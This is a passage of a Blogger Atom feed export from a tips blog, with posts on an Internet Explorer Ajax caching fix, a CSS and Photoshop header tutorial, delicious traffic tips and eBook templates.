<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4284377048633026062</id><updated>2011-10-18T21:32:56.370-07:00</updated><category term='Mobile'/><category term='Animation Graphics'/><category term='sms'/><category term='Software tutorials'/><category term='Media player'/><category term='Virus codes'/><category term='Free movies'/><category term='Computer Windows'/><category term='Blog traffic'/><category term='Orkut'/><category term='Make money'/><category term='Google Adsense'/><category term='Yahoo'/><category term='Rapidshare'/><category term='Games consoles'/><category term='Softwares'/><category term='Internet websites'/><category term='Free Internet Calls'/><title type='text'>100 % working tricks</title><subtitle type='html'>Get all the tricks and tutorials on softwares and windows for fee.All tricks are 100 % working and tested</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default?start-index=101&amp;max-results=100'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>115</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-4623583126461816901</id><published>2009-07-28T20:11:00.019-07:00</published><updated>2009-07-28T20:11:11.242-07:00</updated><title type='text'>How to solve Internet Explorer cache issue in Ajax</title><content type='html'>This is a frequent asked question which can be solved simply with a line of code with javascript.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;The problem&lt;/strong&gt;&lt;br /&gt;If you use Internet Explorer you can find an annoying problem when you send multiple requests using Ajax. All new requests after the first request (using &lt;em&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;http&lt;/span&gt;.open&lt;/em&gt; method),  mantain the same value of the first request. This problem is caused by Internet Explorer use of cache.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;When you call the method:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;http&lt;/span&gt;.open&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;add a random variable using &lt;em&gt;Math&lt;/em&gt; object and add it in the method's URL argument, for example:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;nocache = &lt;span style="color: rgb(51, 153, 153);"&gt;Math&lt;/span&gt;.random&lt;span style="color: rgb(0, 0, 153);"&gt;()&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;http&lt;/span&gt;.open(&lt;span style="color: rgb(51, 51, 255);"&gt;'get'&lt;/span&gt;,&lt;span style="color: rgb(51, 51, 255);"&gt; 'page.php?url_parameter='&lt;/span&gt;+parameter+&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="font-weight: bold;"&gt;'&amp;amp;nocache = '&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;+nocache&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;In this way all the new request will have an URL parameter (&lt;em&gt;&amp;amp;nocache&lt;/em&gt;) which force the browser to "refresh" the old value with the new value.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-4623583126461816901?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/4623583126461816901/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=4623583126461816901' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4623583126461816901'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4623583126461816901'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-solve-internet-explorer-cache.html' title='How to solve Internet Explorer cache issue in Ajax'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-234930010270260216</id><published>2009-07-28T20:11:00.017-07:00</published><updated>2009-07-28T20:11:10.253-07:00</updated><title type='text'>How to design a sexy header for your site using CSS</title><content type='html'>&lt;div class="bigInt"&gt;Step by step tutorial to implement a typographic style header using Photoshop and CSS.&lt;/div&gt;&lt;br /&gt;Yesterday I received a lot of positive messages about the new template of my site. Expecially for the new &lt;em&gt;header&lt;/em&gt; (in particular the green bar on top of the page). Some of my readers asked to me to dedicate a post about how to realize a similar "graphic composition", so I decided to publish a post with the "process" I use in general to design graphical sections for my web sites.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;First approach: be simple.&lt;/strong&gt;&lt;br /&gt;The most important rule is: &lt;em&gt;be simple&lt;/em&gt;. Avoid complex CSS structure beacuse in most cases it is not necessary. Woork header is composed from three DIV elements:&lt;br /&gt;&lt;br /&gt;- Logo layer&lt;br /&gt;- Navigation bar&lt;br /&gt;- Green site introduction section&lt;br /&gt;&lt;br /&gt;Each element has a fixed width but how  &lt;em&gt;navigation bar&lt;/em&gt; and site &lt;em&gt;introduction section&lt;/em&gt; fit the page size. So you need other two liquid layer (width=100%) which will contain your &lt;em&gt;navigation bar&lt;/em&gt; and &lt;em&gt;introduction section&lt;/em&gt;. You can schematize this layout in this way:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_TqPdHmAEwTM/R9PUkthRQ8I/AAAAAAAABMY/B3hJDP0QZ20/s1600-h/section-structure.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_TqPdHmAEwTM/R9PUkthRQ8I/AAAAAAAABMY/B3hJDP0QZ20/s400/section-structure.png" alt="" id="BLOGGER_PHOTO_ID_5175714123938350018" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Another solution to avoid container layers is applying a background picture to the &lt;em&gt;&amp;lt;body&amp;gt;&lt;/em&gt; section using css, but I prefer working with pure layer instead of images to have more control on the design. In fact if you use a background image for the body, if you decide to change for example &lt;em&gt;height&lt;/em&gt; or &lt;em&gt;color&lt;/em&gt; of the &lt;em&gt;navigation bar&lt;/em&gt; you have every time also changing the background image.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Design the header with Photoshop&lt;/strong&gt;&lt;br /&gt;A good practice is trying to design first your header in Photoshop to have an idea about how it will look. Replicate with Photoshop the header structure and choose some colors for its elements until you are not satisfied for the result:&lt;br /&gt;&lt;br /&gt;&lt;img style="border: 1px solid rgb(222, 222, 222); margin: 0px auto 10px; padding: 10px; display: block; text-align: center;" src="http://4.bp.blogspot.com/_TqPdHmAEwTM/R9PQsdhRQ7I/AAAAAAAABMQ/QjNrHdc4KiY/s400/photohop1.png" alt="" id="BLOGGER_PHOTO_ID_5175709859035825074" border="0" /&gt;&lt;br /&gt;When you think your header is ok you can start to convert the picture into HTML and CSS code. Before you leave Photoshop, create an image to apply to  &lt;em&gt;site introduction section&lt;/em&gt; background. This is a small image like this:&lt;br /&gt;&lt;img style="border: 1px solid rgb(222, 222, 222); margin: 0px auto 10px; padding: 10px; display: block; text-align: center;" src="http://1.bp.blogspot.com/_TqPdHmAEwTM/R9Pp4thRQ9I/AAAAAAAABMg/kC1x3fx9vgY/s400/bg-nav-image.png" alt="" id="BLOGGER_PHOTO_ID_5175737557279917010" border="0" /&gt;&lt;br /&gt;&lt;strong&gt;HTML and CSS code&lt;/strong&gt;&lt;br /&gt;HTML code for your header is very simple:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;div id=&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;"logo"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;div id=&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;"navbar-container"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt;    &lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;div id=&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;"navbar"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;a href=&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;"#"&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;gt;&lt;/span&gt;Home&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;/a&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;a href=&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;"#"&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;gt;&lt;/span&gt;About&lt;span style="color: rgb(0, 153, 0);"&gt;&amp;lt;/a&amp;gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&amp;lt;!-- Other links here...--&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;    &lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;div id=&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;"int-site-container"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt;    &lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;div id=&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;"int-site"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;... and CSS code is:&lt;br /&gt;&lt;div class="code"&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;/* Reset Body Property */&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;body{&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;border&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;0&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt; &lt;span style="color: rgb(0, 0, 153);"&gt;margin&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;0&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt; &lt;span style="color: rgb(0, 0, 153);"&gt;padding&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;0&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;#navbar-container{&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;background&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;#000000&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;#int-site-container{&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;background&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;url(img/int-bg.png) left top repeat-x&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;height&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;166px&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;#logo, #navbar, #int-site{&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;width&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;800px&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;margin&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;0 auto&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;/*------------------*/&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;/* LOGO             */&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;#logo{&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;height&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;54px&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;/*------------------*/&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;/* Nav Bar             */&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;#navbar{&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;height&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;26px&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;line-height&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;26px&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;    #navbar a:link, #navbar a:visited, #navbar a:hover{&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt; color&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;#FFFFFF&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;font-weight&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;bold&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;margin-right&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;20px&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;text-decoration&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;none&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;strong&gt;Create Rays of Light for introduction section  background&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;To improve the look of my header I choose to add a background with a simple graphical element: some &lt;em&gt;rays of light&lt;/em&gt;. To create this effect, create a triangle using Photoshop &lt;em&gt;Pen Tool&lt;/em&gt;. Copy this object and rotate the new object of 20 degrees (set the rotation point to left-bottom):&lt;br /&gt;&lt;br /&gt;&lt;img style="border: 1px solid rgb(222, 222, 222); margin: 0px auto 10px; padding: 10px; display: block; text-align: center;" src="http://2.bp.blogspot.com/_TqPdHmAEwTM/R9PuX9hRQ_I/AAAAAAAABMw/5EBY3MDzWzI/s400/ray-of-light.png" alt="" id="BLOGGER_PHOTO_ID_5175742492197340146" border="0" /&gt;&lt;br /&gt;Repeat this action until you designed a semi-circle. Select all element and create a &lt;em&gt;smart object&lt;/em&gt; (selecting all "ray of light" layers and clicking on right mouse button -&gt; create smart object). Then create a selection on the orange background and paste into the selection the smart object with your "rays of light". Set the &lt;em&gt;Fill&lt;/em&gt; percentage to 19% and apply &lt;em&gt;Color Burn&lt;/em&gt; filter to "rays of light" layer. The result is like this:&lt;br /&gt;&lt;br /&gt;&lt;img style="border: 1px solid rgb(222, 222, 222); margin: 0px auto 10px; padding: 10px; display: block;" src="http://4.bp.blogspot.com/_TqPdHmAEwTM/R9P0ndhRRAI/AAAAAAAABM4/4CA5UkfkZU8/s400/rayoflight-2.png" alt="" id="BLOGGER_PHOTO_ID_5175749355555079170" border="0" /&gt;&lt;br /&gt;...and now free your creativity adding graphical element to your &lt;em&gt;site introduction section&lt;/em&gt;. On my site I chose a simple typographic style adding a tag cloud of the main topics which my readers can find on woork.&lt;br /&gt;&lt;br /&gt;&lt;span style="display: block;" id="formatbar_Buttons"&gt;&lt;span class="on down" style="display: block;" id="formatbar_CreateLink" title="Link" onmouseover="ButtonHoverOn(this);" onmouseout="ButtonHoverOff(this);" onmouseup="" onmousedown="CheckFormatting(event);FormatbarButton('richeditorframe', this, 8);ButtonMouseDown(this);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_TqPdHmAEwTM/R9P5f9hRRBI/AAAAAAAABNA/sBGpjHIOK4s/s400/Immagine+22.png" alt="" id="BLOGGER_PHOTO_ID_5175754724264199186" border="0" /&gt;&lt;br /&gt;If you are looking for nice fonts to download for free, I suggest to try on &lt;a href="http://www.dafont.com/"&gt;dafont.com&lt;/a&gt;, a great resource to find inspiration and all fonts you need.&lt;br /&gt;Now, last step, add the image background you created into your CSS code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;#int-site{&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;background&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;url(img/site-intro.png) left top no-repeat&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;&lt;/span&gt; &lt;span style="color: rgb(0, 0, 153);"&gt;height&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;166px&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;;}&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;It's all!&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5124626767371640482" style="cursor: pointer;" alt="" src="http://2.bp.blogspot.com/_TqPdHmAEwTM/Rx5U5LulHqI/AAAAAAAAAbo/NpIXE-ezOuU/s400/page_white_code_red.png" align="absmiddle" border="0" /&gt;  &lt;a href="http://www.box.net/shared/j58fpxn480"&gt;Download to see the result&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;I hope this post can help you to find inspiration from "simplicity" to design your site.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-234930010270260216?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/234930010270260216/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=234930010270260216' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/234930010270260216'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/234930010270260216'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-design-sexy-header-for-your-site.html' title='How to design a sexy header for your site using CSS'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_TqPdHmAEwTM/R9PUkthRQ8I/AAAAAAAABMY/B3hJDP0QZ20/s72-c/section-structure.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1017599043573354054</id><published>2009-07-28T20:11:00.015-07:00</published><updated>2009-07-28T20:11:09.164-07:00</updated><title type='text'>One shot, one kill: how to become popular with (almost) each post you write on your blog</title><content type='html'>&lt;div class="bigInt"&gt;Do you need traffic for your website? Take a look at these simple tips...&lt;/div&gt;&lt;br /&gt;This post is dedicated to every people who wrote me asking to me how I made popular a lot of my posts on &lt;a href="http://del.icious.com/"&gt;delicious&lt;/a&gt; in the past weeks. There is a "simple" way to make popular your post and assure a costant high traffic on your site for a medium period conquering a place on &lt;a href="http://del.icious.com/"&gt;delicious&lt;/a&gt; home page... and this is what you have to do.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh4.google.it/antonio.lupetti/R-5dYexYFdI/AAAAAAAABcU/nnyLlXDPuZM/oneshot1.png" style="border: 1px solid rgb(222, 222, 222); padding: 10px;" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Step 1: Write something interesting&lt;/strong&gt;&lt;br /&gt;...otherwise it's all useless.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step 2: your link on delicious/popular page&lt;/strong&gt;&lt;br /&gt;If you want to conquer delicious home page with your new post, the first step is do appear your new post/link on &lt;a href="http://del.icio.us/popular"&gt;del.icio.us/popular&lt;/a&gt;  page:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh5.google.it/antonio.lupetti/R_AB-OxYFgI/AAAAAAAABc0/AodanyZ_Aew/delicious.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;How can you do it? It's not so difficult if you have a medium daily traffic and a god number of feeds subscribers. I noticed in average 10-12 votes on delicious (users who save your link to their bookmars) in 30 minutes are enough to do appear your link on  &lt;a href="http://del.icio.us/popular"&gt;delicious/popular&lt;/a&gt; page and - this is the good news - immediatly you'll receive a high number of new visits from this page.&lt;br /&gt;&lt;br /&gt;The "bad" news is: if you want to remain for a long time on   &lt;a href="http://del.icio.us/popular"&gt;delicious/popular&lt;/a&gt; page page (and in this way have a possibility to conquer delicious home page) you have to mantain an increasing votes trend for your link. And how can you do it? The faster way is using social network to promote your new post.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step 3: Publish it and promote it on social networks&lt;/strong&gt;&lt;br /&gt;In general I use this simple... let me say... "rule" which works very well: when I publish a post on &lt;em&gt;Woork&lt;/em&gt; the first thing I do is add it to some &lt;em&gt;general news sites&lt;/em&gt; (I use only &lt;a href="http://www.digg.com/"&gt;digg&lt;/a&gt;, &lt;a href="http://www.mixx.com/"&gt;mixx&lt;/a&gt;, &lt;a href="http://www.reddit.com/"&gt;reddit&lt;/a&gt;) and other &lt;em&gt;niche websites&lt;/em&gt; related to the topics about which I write on my blog (&lt;a href="http://dzone.com/"&gt;Dzone&lt;/a&gt;, &lt;a href="http://designfloat.com/"&gt;Design Float&lt;/a&gt; and &lt;a href="http://cssglobe.com/"&gt;CSS Globe&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh5.google.it/antonio.lupetti/R-5cauxYFcI/AAAAAAAABcM/fl_KYnV8Onc/oneshot.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Combined effect in terms of visits from these websites produces in general the hoped result and the number of people who save your link on delicious will increase quickly. In this way after one / two hours your link on delicious will catch up 100 votes, enough to appears on &lt;a href="http://del.icious.com/"&gt;delicious&lt;/a&gt; home page!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1017599043573354054?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1017599043573354054/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1017599043573354054' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1017599043573354054'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1017599043573354054'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/one-shot-one-kill-how-to-become-popular.html' title='One shot, one kill: how to become popular with (almost) each post you write on your blog'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-775471019500267845</id><published>2009-07-28T20:11:00.013-07:00</published><updated>2009-07-28T20:11:07.945-07:00</updated><title type='text'>How to create an awesome eBook Template using Word or Apple Pages</title><content type='html'>&lt;div class="bigInt"&gt;Today I received some requests about &lt;a href="http://woork.blogspot.com/2009/01/woork-handbook.html"&gt;The Woork Handbook&lt;/a&gt; template I published yesterday. Some readers asked to me to distribute that template for their eBooks. So in this post I want to illustrate some guidelines to create an awesome eBook template, quickly and in few steps.&lt;/div&gt;&lt;br /&gt;I prepared the template which you can download (for Apple Pages and  Microsoft Word) and reuse it for your eBooks (I used Apple pages to write the eBook!).&lt;br /&gt;&lt;br /&gt;&lt;img src="http://1.bp.blogspot.com/_TqPdHmAEwTM/R6Ds89u3tkI/AAAAAAAAA0U/biqUma6R5w4/s400/tag_orange.png" align="absmiddle" border="0" /&gt; &lt;a href="http://www.box.net/shared/fekhotnsva"&gt;Download Apple Pages template&lt;/a&gt;    &lt;img 